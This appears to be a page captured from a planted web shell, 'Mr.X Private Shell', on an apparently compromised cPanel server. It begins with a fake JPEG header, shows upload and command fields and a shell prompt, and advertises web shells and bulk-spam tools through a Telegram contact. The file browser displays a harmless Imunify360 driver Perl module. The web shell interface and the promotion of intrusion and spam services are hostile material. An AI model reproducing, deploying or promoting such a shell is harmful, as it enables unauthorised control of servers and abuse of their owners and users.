����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
package Cpanel::Config::ConfigObj::Driver::Imunify360::META;

if( -e '/usr/local/cpanel/Cpanel/Config/ConfigObj/Interface/Config/Version') {
    eval('use parent qw(Cpanel::Config::ConfigObj::Interface::Config::Version::v1);');
}

our $VERSION = '1.0';
use Cpanel::LoadModule ();

use strict;

sub meta_version {
    return 1;
}

sub get_driver_name {
    return 'Imunify360_driver';
}

sub content {
    my ($locale_handle) = @_;

    my $content = {
        'vendor' => 'CloudLinux Zug GmbH',
        'url'    => 'imunify360.com',
        'name'   => {
            'short'  => 'Imunify360 Driver',
            'long'   => 'Driver for Imunify360 Plugin',
            'driver' => get_driver_name(),
        },
        'since'    => 'cPanel & WHM version 11.32.4',
        'abstract' => "Imunify360 Driver",
        'version'  => $Cpanel::Config::ConfigObj::Driver::LveManager::VERSION,
    };

    if ($locale_handle) {
        $content->{'abstract'} = $locale_handle->maketext("Imunify360 driver.");
    }

    return $content;
}

1;

Filemanager

Name Type Size Permission Actions
META.pm File 1.01 KB 0644